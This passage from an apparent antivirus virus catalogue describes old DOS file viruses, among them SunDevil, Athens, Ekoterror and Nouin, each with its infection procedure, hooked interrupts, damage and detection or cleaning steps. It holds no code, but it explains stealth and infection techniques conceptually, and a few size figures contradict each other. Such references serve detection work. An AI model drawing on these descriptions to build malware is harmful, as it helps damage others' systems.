  6942.    all COM files in the current directory will be infected.
  6943. 2) When infecting files, the virus does not hook INT 24h. Error
  6944.    message will appear when I/O errors occur.
  6945.  
  6946. [Tiny-143]
  6947. Virus Name: Tiny-143
  6948. Virus Type: Memory Resident (OS), File Virus
  6949. Virus Length: Infected COM files increase by 143 bytes
  6950.  
  6951. PC Vectors Hooked:  INT 21h
  6952.  
  6953. Execution Procedure:
  6954. 1) Searches for a COM file in the current directory.
  6955. 2) Checks if the file is infected. If yes, it continues to search.
  6956. 3) If an uninfected file is found, it proceeds to infect it
  6957.    (only infects one file at a time).
  6958.  
  6959. Damage: None
  6960.  
  6961. Detection method:
  6962. 1) Date and time fields of infected files are changed.
  6963. 2) Infected files increase by 143 bytes.
  6964.  
  6965. [Smal-122B]
  6966. Virus Name: Smal-122B
  6967. Virus Type: Memory Resident(OS), File Virus
  6968. Virus Length: Infected COM and EXE files increase by 122 bytes.
  6969.  
  6970. PC Vectors Hooked:  INT 21h
  6971.  
  6972. Execution Procedure: Checks whether it resides in the memory. If not,
  6973. the virus copies itself to absolute address 0000:0103h. Then hooks
  6974. INT21h and goes back to the original routine. If the program to be
  6975. executed is an uninfected COM or EXE file and its first byte is
  6976. not E9h, the virus proceeds to infect it.
  6977.  
  6978. Damage: EXE files are destroyed because of the subsequent head
  6979. damage.
  6980.  
  6981. Note: Some interrupts cannot run correctly because the virus has
  6982. stayed resident in the vector area.
  6983.  
  6984. Detection method:
  6985. 1) Date and time fields of infected files are changed.
  6986. 2) Infected files increase by 122 bytes.
  6987.  
  6988. [Printmon]
  6989. Virus Name: Printmon
  6990. Virus Type: File Virus
  6991. Virus Length: Infected COM files increase by 853 bytes.
  6992.  
  6993. PC Vectors Hooked:  INT 17h (printing function) to change
  6994.                     print data.
  6995.  
  6996. Execution Procedure: Checks whether it has hooked INT 17h. If
  6997. not, virus makes some procedure of INT 17h to stay resident in
  6998. the memory. Then proceeds to infect all uninfected COM files with
  6999. length less than 64000 bytes on te current directory and goes back
  7000. to the original routine (During the infection period, it hangs INT
  7001. 24h to prevent divulging its trace when writing).
  7002.  
  7003. Damage: The virus will cause some errors in the printed out data.
  7004.  
  7005. Note:  Date and time fields of infected files are not change.
  7006.  
  7007. Detection method: Infected files will increase by 853 bytes.
  7008.  
  7009. [Tiny-124]
  7010. Virus Name: Tiny-124
  7011. Virus Type: Memory Resident(OS), File Virus
  7012. Virus Length:  Infected COM files increase by 124 bytes.
  7013.  
  7014. PC Vectors Hooked:  INT 21h
  7015.  
  7016. Execution Procedure: Checks whether it resides in the memory. If not,
  7017. the virus copies itself to absolute address 0050:0103h. Then hooks
  7018. INT21h and goes back to the original routine.
  7019.  
  7020. Infection Procedure: If the program to be executed is an uninfected
  7021. COM file and its first byte is not E9h, the virus proceeds to infect
  7022. it.
  7023.  
  7024. Damage: COM files are destroyed because of the subsequent head
  7025. damage.
  7026.  
  7027. Note: Some interrupts cannot run correctly because the virus has
  7028. stayed resident in the vector area.
  7029.  
  7030. Detection method:
  7031. 1) Date and time fields of infected files are changed.
  7032. 2) Infected files increase by 124 bytes.
  7033.  
  7034. [Smal-124]
  7035. Virus Name: Smal-124
  7036. Virus Type: Memory Resident(OS), File Virus
  7037. Virus Length: Infected COM files increase by 124 bytes
  7038.  
  7039. PC Vectors Hooked:  INT 21h
  7040.  
  7041. Execution Procedure: Checks whether it is residing in the memory. If
  7042. not, it copies itself to absolute address  0050:0103h. Then hooks
  7043. INT21h and goes back to the original routine.
  7044.  
  7045. Infection Procedure: If the program to be executed is an
  7046. uninfected COM file, the virus proceeds to infect it.
  7047.  
  7048. Damage: None
  7049.  
  7050. Note: Some interrupts cannot run correctly because the virus has
  7051. stayed resident in the vector area.
  7052.  
  7053. Detection method:
  7054. 1) Date and time fields of infected files are changed.
  7055. 2) Infected files increase by 124 bytes.
  7056.  
  7057. [Troi2]
  7058. Virus Name: Troi2
  7059. Virus Type: Memory Resident(OS), File Virus
  7060. Virus Length: Infected EXE files increase by 512 bytes.
  7061.  
  7062. PC Vectors Hooked:  INT 21h
  7063.  
  7064. Execution Procedure: Checks whether the current date is before
  7065. 5/1/1992. If it is, it returns to the original routine directly.
  7066. Otherwise, checks whether it is residing in the memory. If not,
  7067. the virus copies itself to absolute address 0000:0200h (The area
  7068. for interrupts vectors), hooks INT 21h and goes back to the original
  7069. routine.
  7070.  
  7071. Infection Procedure:
  7072. 1) Hooks INT 21h to check whether it is residing in the memory.
  7073. 2) Hooks INT 21H (AH=4Bh) to infect files. If the program to be
  7074.    executed is an uninfected EXE file, the virus proceeds to infect
  7075.    it.
  7076.  
  7077. Damage: None
  7078.  
  7079. Note: Date and time fields of infected files are not change.
  7080.  
  7081. Detection method: Infected files increase by 512 bytes.
  7082.  
  7083. [Tver]
  7084. Virus Name: Tver
  7085. Virus Type: Memory Resident(OS), File Virus
  7086. Virus Length: Infected COM files increase by 308 bytes.
  7087.  
  7088. PC Vectors Hooked:  INT 21h
  7089.  
  7090. Execution Procedure:
  7091. Checks whether it is residing in the memory. If not, the virus
  7092. copies itself to absolute address 0000:0200h (the area for interrupt
  7093. vectors), hooks INT 21h and goes back to the original routine.
  7094.  
  7095. Infection Procedure:
  7096. 1) Hooks INT 21h to check whether it is residing in the memory.
  7097. 2) Hooks INT 21H (AH=4Bh) to infect files. If the program to be
  7098.    executed is an uninfected COM file and its first byte is E9h,
  7099.    the virus proceeds to infect it.
  7100.  
  7101. Damage: None
  7102.  
  7103. Note: Many virus files' first byte is E9h. In most cases, the virus
  7104. corrects the files' first byte if it is not E9h.
  7105.  
  7106. Detection method:
  7107. 1) Date and time fields of infected files are changed.
  7108. 2) Infected files increase by 308 bytes.
  7109.  
  7110. [Wave]
  7111. Virus Name: Wave
  7112. Virus Type: Memory Resident(OS), File Virus
  7113. Virus Length: Infected COM files increase by 454 bytes.
  7114.  
  7115. PC Vectors Hooked:  INT 21h, 1Ch
  7116.  
  7117. Execution Procedure: Checks whether it is residing in the memory. If
  7118. not, the virus copies itself to absolute address 0000:01ECh (the area
  7119. for interrupt vectors), hooks INT 21h and INT 1Ch, changes the
  7120. pointer of INT 78h to the address pointed by the original INT
  7121. 21h. Then goes back to the original routine.
  7122.  
  7123. Infection Procedure:
  7124. INT 21h:
  7125. 1) Hooks INT 21h to check whether it remains in the memory.
  7126. 2) Hooks INT 21h (AH=4Bh,AH=3Dh) to infect files. If the program
  7127.    to be executed is an uninfected COM, and the combined length of
  7128.    the program and the virus is between 1500 and 64000 bytes and it
  7129.    is on C drive (except A and B drive), then the virus will proceed to
  7130.    infect. Otherwise, it will set a flag to be used by INT 1Ch at
  7131.    a later time.
  7132. INT 1Ch: Hooks INT 1Ch to shake the screen from side to side for 33
  7133. seconds after the flag is set by INT 21h.
  7134.  
  7135. Damage: None
  7136.  
  7137. Note: Time and date (except year) of infected files are not
  7138. changed. You cannot see the change when you use the "Dir" command
  7139. because the last two bytes of the data are not changed (You would
  7140. see some problems on arrangement order if you attach "/od" to the
  7141. "Dir" command).
  7142.  
  7143. Detection method: Infected files increase by 454 bytes.
  7144.  
  7145. [Zz1]
  7146. Virus Name: Zz1
  7147. Virus Type: Overwrite, File Virus (COM files)
  7148. Virus Length: 127 bytes
  7149.  
  7150. Execution Procedure: Searches for an uninfected COM file on the
  7151. current directory and infects it (only infects one file at a
  7152. time). If there is no file to infect, it changes data in the
  7153. system RAM to set the screen lines to 81. This confuses the screen.
  7154.  
  7155. Damage:
  7156. 1) It overwrites the first 127 bytes of the original files with the
  7157.    virus code. Original files are destroyed.
  7158. 2) Confuses the screen if there are no infectable files.
  7159.  
  7160. Note: Date and time fields of infected files are not changed.
  7161.  
  7162. [Willow]
  7163. Virus Name: Willow
  7164. Virus Type: Memory Resident, File Virus (EXE files)
  7165. Virus Length:  1870 bytes
  7166.  
  7167. PC Vectors Hooked:  INT 21h
  7168.  
  7169. Execution Procedure: Checks whether it has remained in the
  7170. memory. If not, hooks INT 14h first, then changes the pointer of
  7171. INT FDh to the address that is pointed by INT 21h. Then hooks INT
  7172. 21h. Lastly, after all memory is released, gets the name of the
  7173. Shell executed by the system from the environment parameter. Executes
  7174. this Shell again. Terminates upon reloading itself memory resident.
  7175.  
  7176. Infection Procedure:
  7177. 1) Hooks INT 21h to check whether it has stayed resident in memory.
  7178. 2) Hooks INT 21h(AH=4Bh) to infect files. If the program to be
  7179.    executed is a COM file, the virus deletes it. If it is an EXE file,
  7180.    the virus proceeds to infect it.
  7181.  
  7182. Damage: It deletes COM files executed while the virus is memory
  7183. resident.
  7184.  
  7185. Note: Date and time fields of infected files are not changed.
  7186.  
  7187. Detection method: Infected files increase by 1870-1885 bytes.
  7188.  
  7189. [V-66]
  7190. Virus Name: V-66
  7191. Virus Type: Overwrites, File Virus (all files)
  7192. Virus Length:  66 bytes
  7193.  
  7194. Execution Procedure: Infects all files in the current directory.
  7195.  
  7196. Infection Procedure: Changes the files' attributes, making them
  7197. writable. Proceeds to overwrite the first 66 bytes with the virus
  7198. code.
  7199.  
  7200. Damage: It overwrites the original files with the virus code.
  7201. Original files are destroyed (corrupted).
  7202.  
  7203. Detection method: Date and time fields of infected files are changed.
  7204.  
  7205. [VCL-408]
  7206. Virus Name: VCL408
  7207. Virus Type: Overwrites, File Virus (EXE and COM files)
  7208. Virus Length:  408 bytes
  7209.  
  7210. Execution Procedure: Searches for one uninfected COM or EXE file
  7211. on each directory and infects it. Virus records whether the initial
  7212. infection is successful or not. Subsequent record will overwrite the
  7213. original. Last record is record of last infection. The virus checks
  7214. this record before terminating. If the record fails, the virus halts
  7215. the system.
  7216.  
  7217. Damage:
  7218. 1) Files are corrupted after becoming infected.
  7219. 2) Halts system on occasion.
  7220.  
  7221. Note:
  7222. 1) Date and time fields of infected files are not changed.
  7223. 2) Length of infected files does not change unless the length of
  7224.    original files is less than 408. If so, the length of infected
  7225.    files becomes 408 bytes.
  7226.  
  7227. [SUNDEVIL]
  7228. Virus Name: SunDevil
  7229. Virus Type: File Virus (COM files)
  7230. Virus Length:  691 bytes
  7231.  
  7232. PC Vectors Hooked:  INT 21h
  7233.  
  7234. Execution Procedure: Checks whether the current date is May 8. If it
  7235. is, it destroys the first sector (Boot sector) on the current diskette.
  7236. Then it displays the following message and repeats call INT 05h.
  7237.  
  7238.     "There is no America. There is no Democracy.
  7239.      There is only IBM, ITT, and AT&T.
  7240.      This virus is dedicated to all that have been
  7241.      busted for computer-hacking activities.
  7242.      The SunDevil Virus (C) 1993 by Crypt Keepr
  7243.      [SUNDEVIL] "
  7244.  
  7245. Otherwise, the virus copies itself to absolute address 9000:0000h.
  7246. Then hooks INT21h and returns to the original routine.
  7247.  
  7248. Infection Procedure: Hooks INT 21h (AH=3D,3E,56, AX=4300,4B00,4B01) to
  7249. infect files. If the program to be executed is an uninfected COM
  7250. file, the virus proceeds to infect it.
  7251.  
  7252. Damage: It destroys the boot sector of the current diskette if the
  7253. current date is May 8.
  7254.  
  7255. Note: Date and time fields of infected files are not changed.
  7256.  
  7257. Detection method:
  7258. 1) Infected files increase by 691 bytes.
  7259. 2) Above message will appear when you use the "Type" command.
  7260.  
  7261. [Skew-469]
  7262. Virus Name: Skew-469
  7263. Virus Type: Memory Resident(OS), File Virus (EXE files)
  7264. Virus Length:  469 bytes
  7265.  
  7266. PC Vectors Hooked:  INT 21h, INT 1Ch
  7267.  
  7268. Execution Procedure: Checks whether it resides in the memory. If
  7269. not, it copies itself to absolute address 0000:0200h, then hooks
  7270. INT21h and goes back to the original routine.
  7271.  
  7272. Infection Procedure:
  7273. 1) Hooks INT 21h (AX=4B00h or AH=3Dh) to infect files. First,
  7274.    it hangs INT 24h to prevent divulging its trace when writing.
  7275.    Then it checks whether the program to be executed is an
  7276.    uninfected EXE file. If it is, it proceeds to infect it. Finally,
  7277.    it restores INT 24h.
  7278. 2) Hooks INT 1Ch. Increases the value of an address by 1 everytime
  7279.    this interrupt is called. When the value equals FFFFh, the virus
  7280.    writes the current value to the video card making the screen move
  7281.    up or down or from side to side.
  7282.  
  7283. Damage: Causes the screen to move up to down or from side to side.
  7284.  
  7285. Detection method:
  7286. 1) Date and time fields of infected files are changed.
  7287. 2) Infected files increase by 469-469+15 bytes.
  7288.  
  7289. [Atas_400]
  7290. Virus Name: Atas_400
  7291. Virus Type: File Virus (COM files)
  7292. Virus Length:  400 bytes
  7293.  
  7294. PC Vectors Hooked:  INT 24h (nullifies the function for dealing with
  7295.                     severe errors)
  7296.  
  7297. Execution Procedure:
  7298. 1) The virus decodes, hangs INT24h to prevent divulging its trace
  7299.    when writing, then it changes its head.
  7300. 2) Searches for an uninfected COM file that is larger than 255 bytes
  7301.    but less than 64256 bytes.
  7302. 3) Checks the system date. If the Seconds field is less than 3, it
  7303.    displays the following message:
  7304.  
  7305.     "I like to travel ...".
  7306.  
  7307.    Then restores INT 24h and goes back to the original routine.
  7308.  
  7309. Damage: None
  7310.  
  7311. Note:
  7312. 1) Only infects one file at a time.
  7313. 2) Date and time fields of infected files are changed.
  7314.  
  7315. [DM-330]
  7316. Virus Name: Dm-330
  7317. Virus Type: Memory Resident, File Virus (COM files)
  7318. Virus Length:  330 bytes
  7319.  
  7320. PC Vectors Hooked:  INT 21h, 5Fh
  7321.  
  7322. Execution Procedure:
  7323. 1) The virus decodes, then checks whether it has stayed resident
  7324.     in the memory. If not, it moves itself to absolute address
  7325.     from 0000:0208h to 0000:0351h.
  7326. 2) Hooks INT21h and goes back to the original routine.
  7327.  
  7328. Infection Procedure:
  7329. 1) Hooks INT 5Fh. Points to the address pointed by the original
  7330.     INT 21h.
  7331. 2) Hooks INT 21h to infect files. Virus activates when the system
  7332.     calls INT 21h to execute a program (AH=4Bh), changes file's
  7333.     attribute (AH=43h), changes file name (AH=56h), or opens a file
  7334.     (AH=3Dh). The virus checks whether the program to be executed is an
  7335.     uninfected COM file. If it is, the virus infects it.
  7336.  
  7337. Damage: None
  7338.  
  7339. Note:
  7340. 1) The virus stays in the area for interrupt vectors. This causes
  7341.     a conflict in the virus routine and the interrupts vectors
  7342.     (address from 0000:0208h to 0000:0351h).
  7343. 2) Date and time fields of infected files are not changed.
  7344.  
  7345. [CLS]
  7346. Virus Name: Cls
  7347. Virus Type: Memory Resident, File Virus (COM and EXE files)
  7348. Virus Length:  835 bytes
  7349.  
  7350. PC Vectors Hooked:  INT 21h, INT 08h, INT 13h
  7351.  
  7352. Execution Procedure:
  7353. 1) Checks whether it has stayed resident in the memory. If not,
  7354.    it moves itself to high memory.
  7355. 2) Hooks INT 21h, INT 08h and INT 13h and goes back to the
  7356.    original routine.
  7357.  
  7358. Infection Procedure:
  7359. INT 21h:
  7360. 1) Hooks INT21h to check whether it has stayed resident in the
  7361.    memory.
  7362. 2) Hooks INT21h to infect files. Virus activates when the system
  7363.    calls INT21h to execute a program (AH=4Bh). It checks whether
  7364.    the program to be executed is an uninfected COM file and its
  7365.    length is between 129 bytes and 64512 bytes. If it is, the
  7366.    virus infects it.
  7367.  
  7368. INT 08h: Hooks INT 08h (Time interrupt, executed once every 1/18
  7369. second). Every time this interrupt executes, a counter increments
  7370. by 1. When this counter reaches 65520 (about an hour later), the virus
  7371. cleans the screen (It has no effect on monochrome because the cleaning
  7372. function writes 00 from B800:0000h to B800:0FA0h).
  7373.  
  7374. INT 13h: Hooks INT 13h (virus writing assistance).
  7375.  
  7376. Damage: The virus cleans the screen once every hour.
  7377.  
  7378. Note: Date and time fields of infected files are not changed.
  7379.  
  7380. Detection method: Infected files increase by 853 bytes.
  7381.  
  7382. [Nouin]
  7383. Virus Name: Nouin
  7384. Virus Type: Memory Resident, File Virus (COM and EXE files)
  7385. Virus Length:  855 bytes
  7386.  
  7387. PC Vectors Hooked:  INT 83h, 09h, 21h
  7388.  
  7389. Execution Procedure:
  7390. 1) Checks whether it has stayed resident in the memory. If not,
  7391.    it loads itself to high memory.
  7392. 2) Hooks INT 21h, INT 09h and INT 83h and goes back to the original
  7393.    routine. (The method the virus uses to load itself to memory is
  7394.    fairly crude. It needs the last MCB controlled by DOS in the
  7395.    address when loading the executed program).
  7396.  
  7397. Infection Procedure:
  7398. 1) Hooks INT 83h to store a word for reporting whether the virus
  7399.    has stayed resident in the memory or not.
  7400. 2) Hooks INT 09h to decrement a counter by 1 every time a key is
  7401.    pressed. Sets the damage_flag when the value reaches zero.
  7402. 3) Hooks INT 21h (AH=3Dh,aH=43h,AX=4B00h). It checks whether
  7403.    the program to be executed is an uninfected EXE or COM file
  7404.    (it skips SCAN.EXE and CLEAN.EXE). If it is a COM file, the virus
  7405.    checks whether or not the file is larger than 60000. If it is, the
  7406.    virus infects it. Then it checks if the damage_flag is set. If
  7407.    it is, the virus checks if the current date is between November 11
  7408.    and 30. If it is, the virus destroys sectors 1 to 9 on the current
  7409.    diskette.
  7410.  
  7411. Damage: After the virus has stayed resident in the memory, and
  7412. the number of times the keyboard has been struck is equal to a certain
  7413. value, or the current date is between November 11 and 30, it will
  7414. destroy sectors 1 to 9 on the current diskette.
  7415.  
  7416. Note: Date and time fields of infected files are not changed.
  7417.  
  7418. Detection method: Infected files increase by 855 bytes.
  7419.  
  7420. [V-550]
  7421. Virus Name: V-550
  7422. Virus Type: Memory Resident, File Virus (EXE files)
  7423. Virus Length:  550 bytes
  7424.  
  7425. PC Vectors Hooked:  INT 21h
  7426.  
  7427. Execution Procedure:
  7428. 1) The virus checks whether it has stayed resident in
  7429.    the memory, and the block of memory which loads the current program
  7430.    is the last MCB. If it is, it moves itself to high memory.
  7431. 2) Hooks INT21h and goes back to the original routine.
  7432.  
  7433. Infection Procedure:
  7434. 1) Hooks INT 21h to check whether it has stayed resident in the memory.
  7435. 2) Hooks INT 21h to check whether the program to be executed is an
  7436.    uninfected EXE file. If it is, the virus infects it.
  7437.  
  7438. Damage: None
  7439.  
  7440. Detection method:
  7441. 1) Date and time fields of infected files are changed.
  7442. 2) Infected files increase by about 550 bytes.
  7443. 3) The total memory decreases by 39 pares after the virus has stayed
  7444.    resident in the memory.
  7445.  
  7446. [Angarsk]
  7447. Virus Name: Angarsk
  7448. Virus Type: File Virus (COM files)
  7449. Virus Length:  238 bytes
  7450.  
  7451. Execution Procedure: Searches for all uninfected COM files on
  7452. the current and root directories and infects them (length
  7453. of infectable files must be less than 32768 bytes).
  7454.  
  7455. Damage: None
  7456.  
  7457. Detection method:
  7458. 1) Date and time fields of infected files are changed.
  7459. 2) Infected files increase by about 238 bytes.
  7460.  
  7461. [Enet-613]
  7462. Virus Name: Enet-613
  7463. Virus Type: File Virus (COM files)
  7464. Virus Length:  613 bytes
  7465.  
  7466. Execution Procedure:
  7467. 1) Infects all COM files on the current directory (It does not infect
  7468.    the same file again).
  7469. 2) Checks whether the current day is Sunday. If it is, it displays a
  7470.    message and waits until a key is pressed.
  7471. 3) Changes the word at address 4000:0013h of RAM to 0200h.
  7472. 4) Calls INT 19h to reboot the system.
  7473.  
  7474. Damage: None
  7475.  
  7476. Note:
  7477. 1) Date and time fields of infected files are not changed.
  7478. 2) Infected files increase from 613-628 bytes.
  7479.  
  7480. [Fri-13D]
  7481. Virus Name: Fri-13-D
  7482. Virus Type: File Virus (COM files)
  7483. Virus Length:  416 bytes
  7484.  
  7485. Execution Procedure:
  7486. 1) When an infected program is executed, it will infect all COM
  7487.    files (except COMMAND.COM) on the current directory (it does
  7488.    not infect the same file again).
  7489. 2) Checks whether the current day is Friday the 13th. If it is,
  7490.    it deletes itself and then goes back to the original routine.
  7491.  
  7492. Damage: An infected program will delete itself if you run it
  7493. on Friday the 13th.
  7494.  
  7495. Detection method:
  7496. 1) Date and time fields of infected files are changed.
  7497. 2) Infected files increase from 416-431 bytes.
  7498.  
  7499. [Ash]
  7500. Virus Name: Ash
  7501. Virus Type: File Virus (COM files)
  7502. Virus Length:  280 bytes
  7503.  
  7504. Execution Procedure: Infects all infectable COM files on the current
  7505. directory (It does not infect the same file again, and does not
  7506. infect files larger than 64768). If the number of newly infected files
  7507. is less than 2, it will search for infectable files on its father and
  7508. father's father directory.
  7509.  
  7510. Damage: None
  7511.  
  7512. Detection Method:
  7513. 1) Date and time fields of infected files are changed.
  7514. 2) Infected files increase by 280 bytes.
  7515.  
  7516. [Bljec-1]
  7517. Virus Name: Bljec-1
  7518. Virus Type: File Virus (COM files)
  7519. Virus Length:  301 bytes
  7520.  
  7521. Execution Procedure: Checks whether the current month is September.
  7522. If it is, it will format the first 16 sectors of the current diskette,
  7523. then infects all COM files on the current directory.
  7524.  
  7525. Damage: Formats the first 16 sectors of the current diskette if the
  7526. current month is September.
  7527.  
  7528. Detection Method:
  7529. 1) Date and time fields of infected files are not changed.
  7530. 2) Infected files increase by 301 bytes.
  7531.  
  7532. [Cas-927]
  7533. Virus Name: Cas-927
  7534. Virus Type: Memory Resident(HiMem), File Virus (COM files)
  7535. Virus Length:  3+927 bytes
  7536.  
  7537. PC Vectors Hooked:  INT 21h, 1Ch, 28h
  7538.  
  7539. Execution Procedure:
  7540. 1) The virus decodes.
  7541. 2) Checks whether it has stayed resident in the memory. If not,
  7542.    it loads itself resident in the high memory.
  7543. 3) Hooks INT 21h, INT 1Ch and INT 28h and goes back to the original
  7544.    routine.
  7545.  
  7546. Infection Procedure:
  7547. INT 21h:
  7548. 1) Hooks INT 21h to check whether it has stayed resident in
  7549.    the memory.
  7550. 2) Hooks INT 21h(AX=4B00h) to infect files. If the program to be
  7551.    executed is an uninfected COM file and its length is not
  7552.    larger than 63500 bytes, the virus infects it.
  7553.  
  7554. INT 28h:
  7555. Hooks INT 28h to check whether the current month is an even month,
  7556. current day is Sunday, Tuesday, Thursday, or Saturday, and
  7557. current time is 11:11:11. If all these conditions are satisfied, it
  7558. sets a damage_flag to be used later by INT 1Ch.
  7559.  
  7560. INT 1Ch:
  7561. Hooks INT 1Ch to cooperate with INT 28h. If the damage_flag is set,
  7562. it changes all uppercase characters on the screen to lowercase.
  7563.  
  7564. Damage: None
  7565.  
  7566. Note:
  7567. 1) The virus stays resident in the high memory (it uses 7A pares).
  7568. 2) Infected files increase by 855 bytes.
  7569. 3) Date and time fields of infected files are not changed.
  7570.  
  7571. [CSFK]
  7572. Virus Name: Csfk
  7573. Virus Type: Memory Resident(MCB), File Virus (COM files)
  7574. Virus Length:  5+918 bytes
  7575.  
  7576. PC Vectors Hooked:  INT 21h
  7577.  
  7578. Execution Procedure:
  7579. 1) The virus decodes.
  7580. 2) Checks whether it has stayed resident in the memory. If not, it
  7581.    loads itself memory resident.
  7582. 3) Hooks INT 21h and goes back to the original routine.
  7583.  
  7584. Infection Procedure:
  7585. 1) Hooks INT 21h to check whether it has stayed resident in
  7586.    the memory.
  7587. 2) Hooks INT 21(AH=4Bh) to infect files. If the program to be
  7588.    executed is an uninfected COM file and its length is between
  7589.    25 bytes and 63500 bytes, the virus infects it.
  7590.  
  7591. Damage: None
  7592.  
  7593. Note:
  7594. 1) The virus stays resident in the memory (MCB) (it uses 6A pares).
  7595. 2) Infected files increase by 918 bytes.
  7596. 3) Date and time fields of infected files are not changed.
  7597.  
  7598. [Warrier1]
  7599. Virus Name: Warrier1
  7600. Virus Type: Memory Resident(HiMem), File Virus (COM files)
  7601. Virus Length: 300 bytes
  7602. PC Vectors Hooked:  INT 21h
  7603.  
  7604. Execution Procedure:
  7605. 1) The virus decodes.
  7606. 2) Checks whether it has stayed resident in the memory. If not, it
  7607.     loads itself memory resident.
  7608. 3) Hooks INT21h and goes back to the original routine.
  7609.  
  7610. Infection Procedure: Hooks INT 21h(AX=4B00h) to infect files. If the
  7611. program to be executed is an uninfected COM file (except
  7612. COMMAND.COM), the virus infects it.
  7613.  
  7614. Damage: None
  7615.  
  7616. Note:
  7617. 1) The virus stays resident in the high memory (it uses 61 pares).
  7618. 2) Date and time fields of infected files are not changed.
  7619. 3) The change in the infected file's length varies depending on the
  7620.     following:
  7621.     i) If the original file is not larger than 768 bytes, its
  7622.         infected version will be 1536 bytes long.
  7623.    ii) If the original file is larger than 768 bytes, its infected
  7624.         version will increase by 768 bytes.
  7625.  
  7626. Cleaning Method: Delete the first 768 bytes from infected files.
  7627.  
  7628. [Athens]
  7629. Virus Name: Athens
  7630. Virus Type: Memory Resident(HiMem), File Virus (COM and EXE files)
  7631. Virus Length: 1,463 bytes
  7632.  
  7633. PC Vectors Hooked:  INT 21h
  7634.  
  7635. Execution Procedure:
  7636. 1) The virus decodes.
  7637. 2) Checks whether it has stayed resident in the memory. If not, it
  7638.     loads itself resident in the high memory.
  7639. 3) Hooks INT21h and goes back to the original routine.
  7640.  
  7641. Infection Procedure:
  7642. 1) Hooks INT 21h to check whether it has stayed resident in
  7643.     the memory.
  7644. 2) Hooks INT 21h(AX=4B00h) to infect files. If the program to be
  7645.     executed is an uninfected EXE or COM (except COMMAND.COM)
  7646.     file, the virus infects it.
  7647. 3) Hooks INT 21h (AX=4Eh,4Fh,11h,12h) to check
  7648.     whether the current program has been infected. If it is, the
  7649.     virus changes the file's length and date in DTA to their original
  7650.     data. This prevents users from noticing the change in the length
  7651.     and date of infected files while the virus is memory resident.
  7652.  
  7653. Damage: None
  7654.  
  7655. Note:
  7656. 1) The virus stays resident in the high memory (it uses DFh pares).
  7657. 2) Infected files increase by 1463 bytes. You can not see
  7658.     the increase while the virus is memory resident.
  7659. 3) Date and time fields of infected files are changed. You can not
  7660.     see this while the virus is memory resident.
  7661.  
  7662. [Commy]
  7663. Virus Name: Commy
  7664. Virus Type: File Virus (COM files)
  7665. Virus Length:  998 bytes
  7666.  
  7667. Execution Procedure:
  7668. 1) The virus decodes.
  7669. 2) Checks whether the current minute is less than 10, and the current
  7670.     DOS version is above 3.0. If all these conditions are satisfied,
  7671.     it will search for a COM file with length between 4567 bytes and
  7672.     64520 bytes, and infects it (the virus infects one file at a time).
  7673. 3) It goes back to the original routine.
  7674.  
  7675. The search path is the value specified by PATH. When the virus infects
  7676. a file, it encodes the file's time to verify it is infected.
  7677.  
  7678. Damage: None
  7679.  
  7680. Note:
  7681. 1) Infected files increase by 998 bytes.
  7682. 2) The dates of infected files are not changed.
  7683. 3) The time fields of infected files are changed due to the encoding.
  7684.  
  7685. [Arriba]
  7686. Virus Name: Arriba
  7687. Virus Type: Memory resident, File Virus (COM and EXE files)
  7688. Virus Length: 1,590 bytes
  7689.  
  7690. PC Vectors Hooked:  INT 21h, INT 08h
  7691.  
  7692. Execution Procedure:
  7693. 1) Checks whether it has stayed resident in the memory. If it has,
  7694.     it will go back to the original routine directly. Otherwise, it
  7695.     will move itself to high memory.
  7696. 2) Hooks INT21h and checks whether the current date is November 20. If
  7697.     it is, it hooks INT 08h and goes back to the original routine.
  7698.  
  7699. Infection Procedure: Hooks INT 08h to display a message and then halt
  7700. the system. Hooks INT 21h(AX=4B00) to check whether the program being
  7701. executed is infected. If not, the virus will infect it in
  7702. different ways according to its type: if it is a COM file, it
  7703. will write the virus code at the beginning of the original file,
  7704. followed by the original file's code, and attach two bytes of
  7705. identified code at the end of the file to verify that this file is
  7706. already infected; if it is an EXE file, it will attach the virus code
  7707. at the end of the original file's code, then change the head of file
  7708. and attach the identified code at the end.
  7709.  
  7710. Damage: Halts the system when INT 08h is called.
  7711.  
  7712. Note:
  7713. 1) The date and time fields of infected files are not changed.
  7714. 2) The method the virus uses to move the code is special. First, it
  7715.     tests whether the address A0000h is writable. If not, it moves 1000
  7716.     bytes of this area to a lower address repeatedly until it finds a
  7717.     writable area. Then it moves the virus codes into this area. You
  7718.     will not notice the changes in the memory by MEM program because
  7719.     it has not changed the size of the memory blocks. This method may
  7720.     cause damage to the virus code, and may even halt the system.
  7721.  
  7722. Detection method: Infected files increase by 1590 bytes.
  7723.  
  7724. [Ekoterror]
  7725. Virus Name: Ekoterror
  7726. Virus Type: Memory Resident(HiMem), File Virus, Partition Virus
  7727. Virus Length: 2,048 bytes
  7728. PC Vectors Hooked:  INT 08h, 13h, 21h
  7729.  
  7730. Execution Procedure:
  7731. 1) When an infected program is executed, the virus writes its viral
  7732.     code to the Partition. The virus will not check whether the
  7733.     Partition is already infected or not, thus executing an infected
  7734.     file several times will delete all data in the Partition.
  7735. 2) Hooks INT 08h, INT 13h, and call INT 08h to check whether DOS has
  7736.     been loaded. If it has, it hooks INT 21h.
  7737.  
  7738. Infection Procedure: Hooks INT 08h to check whether DOS has been
  7739. loaded. If it has, it hooks INT 21h.
  7740. Hooks INT 13h to check whether the sector loaded is the Partition. If
  7741. it is, it will revert back or change the data of the original
  7742. Partition.
  7743. Hooks INT 21h to infect COM files when reading or writing files.
  7744.  
  7745. Damage: The virus deletes the data in the Partition after executing
  7746. an infected file several times.
  7747.  
  7748. Note:
  7749. 1) If the virus has invaded the Partition, you will not be able to
  7750.     load or save data onto the hard disk if you booted the system
  7751.     from a diskette. This is because the data in the Partition has
  7752.     already changed.
  7753. 2) If the DOS version is not suitable, or the INT 08h code does not
  7754.     conform to the DOS loading process, the virus can not hook INT 21.
  7755.     This prevents the virus from infecting files.
  7756.  
  7757. Cleaning Method: Boot up from an uninfected diskette. Then use a
  7758. program that can read or write data on the hard disk (like Debug) to
  7759. write the data of the original Partition back (The virus moves the
  7760. data of the original Partition to 0 side, 0 track, 5 sector. Every
  7761. time it is infected, it will add 4 to the number of sectors).
  7762.  
  7763. [AST-976]
  7764. Virus Name: Ast-976
  7765. Virus Type: Memory Resident, File Virus (COM files)
  7766. Virus Length:  976 bytes
  7767.  
  7768. PC Vectors Hooked:  INT 21h
  7769.  
  7770. Execution Procedure:
  7771. 1) The virus decodes.
  7772. 2) Checks whether it is resident in the memory. If not, it loads itself
  7773.    resident in the high memory.
  7774. 3) Hooks INT 21h and infects all COM files on the current directory (it
  7775.    does not infect the same file again).
  7776. 4) Checks whether the current minute is 17. If it is, it makes some
